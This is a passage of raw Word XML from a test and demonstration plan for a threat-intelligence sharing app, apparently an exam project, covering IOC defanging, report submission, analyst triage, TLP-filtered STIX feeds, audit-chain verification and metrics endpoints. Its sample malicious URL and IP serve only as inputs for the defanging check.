          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Any authenticated identity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In 'Raw Observable Value', enter: '203.0.113.45'.</w:t>
        <w:br/>
        <w:t>2. Observe 'LIVE CANONICAL DEFANGING PREVIEW' box.</w:t>
        <w:br/>
        <w:t>3. Switch Type to 'DOMAIN' and enter: 'https://evil-c2.ru/beacon'.</w:t>
        <w:br/>
        <w:t>4. Type invalid IP: '999.999.999.999'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IPv4 defangs to '203[.]0[.]113[.]45'. Domain defangs to 'hxxps[://]evil-c2[.]ru/beacon'. Invalid IP displays validation error upon submission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Live defanging preview box highlighting bracketed dots and neutralized URI protocols.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-03) &amp; Phase 5 (Strategy Design Pattern)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.7 Structured Threat Report Submission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 2: Tab 2) or POST /api/reports</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>contributor_alex (ROLE_CONTRIBUTOR)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In 'Structured Threat Report', enter Title: 'APT41 Hypervisor Campaign', Summary: 'Edge hypervisor compromise', TLP: 'AMBER', Markdown: 'Initial access via CVE-2024-XXXX'.</w:t>
        <w:br/>
        <w:t>2. Click 'Submit Sanitized Threat Report'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>HTTP 201 Created. Report persisted in SQLite threat_reports table with UUID and linked to submitting organization.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Report submission card displaying green confirmation banner with report UUID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-04) &amp; Phase 4 (ER Relational Model)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.8 Analyst Triage Station &amp; MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 3: Tab 3) or PUT /api/iocs/:id/triage</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>analyst_riya (ROLE_ANALYST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. Switch to 'analyst_riya' persona on Screen 1.</w:t>
        <w:br/>
        <w:t>2. Open Screen 3 ('Analyst Triage Station').</w:t>
        <w:br/>
        <w:t>3. Click '↻ Refresh Queue'.</w:t>
        <w:br/>
        <w:t>4. Click 'Review / Triage' on an indicator.</w:t>
        <w:br/>
        <w:t>5. Set Confidence: 90, MITRE ID: 'T1566.001', TLP: 'GREEN', Justification: 'Confirmed malicious C2 telemetry'.</w:t>
        <w:br/>
        <w:t>6. Click 'Approve &amp; Publish to Feed'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Indicator transitions from 'PENDING' to 'APPROVED'. Immutable entry created in review_logs table with analyst UUID and rationale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Review modal showing Confidence Slider, MITRE ATT&amp;CK ID input, and justification field.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-04) &amp; Phase 3 (Sequence Diagram: Analyst Triage)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.9 Traffic Light Protocol (TLP) Egress Filtering</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: GET http://localhost:3000/api/feeds/stix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>consumer_siem (ROLE_CONSUMER) vs. analyst_riya (ROLE_ANALYST)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Terminal 2, run feed test:</w:t>
        <w:br/>
        <w:t>node --test tests/integration/triageFeedApi.test.js</w:t>
        <w:br/>
        <w:t>2. Compare STIX output for Consumer vs. Analyst.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Consumer STIX bundle contains zero TLP:RED objects (strictly CLEAR, GREEN, AMBER). Analyst STIX bundle includes classified TLP:RED objects with marking definitions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Terminal JSON comparison confirming exclusion of TLP:RED in consumer feed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-SEC-04) &amp; Phase 7 (STRIDE T04 Countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.10 OASIS STIX 2.1 Threat Feed Generation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000 (Screen 4: Tab 4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Any authenticated user</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. Open Screen 4 ('4. STIX 2.1 &amp; Metrics').</w:t>
        <w:br/>
        <w:t>2. Click 'Fetch STIX 2.1 Feed Bundle'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Formatted OASIS STIX 2.1 JSON bundle rendered in UI containing: 'type': 'bundle', 'spec_version': '2.1', marking-definition objects, indicator objects, and MITRE external references.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Screen 4 displaying syntax-highlighted STIX 2.1 JSON bundle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-F-05) &amp; Phase 5 (External System Interfaces)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.11 Tamper-Evident SHA-256 Audit Verification</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>COMMAND: node scripts/verify-audit-chain.js | URL: GET /api/audit/verify</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>admin_sec (ROLE_ADMIN)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Terminal 2, execute:</w:t>
        <w:br/>
        <w:t>node scripts/verify-audit-chain.js</w:t>
        <w:br/>
        <w:t>2. On Screen 4, scroll down to Audit Verification and click 'Run Audit Chain Integrity Verification'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Console and UI return: 'STATUS: VERIFIED | Valid Chains: N | Tampered: 0'. Cryptographic SHA-256 continuous hash chaining verified back to Genesis anchor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Screenshot to Capture: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Terminal displaying '[AUDIT-VERIFIER] STATUS: VERIFIED' and UI green audit verification badge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Exam Phase Mapping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Phase 2 (REQ-SEC-07) &amp; Phase 7 (STRIDE T03/T10 Countermeasure)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>3.12 Prometheus Security Metrics Exposition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint / Command: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>URL: http://localhost:3000/metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Account Persona: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Public / Prometheus Scraper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Execution Steps: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1. In Terminal 2, execute: curl http://localhost:3000/metrics</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Result: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
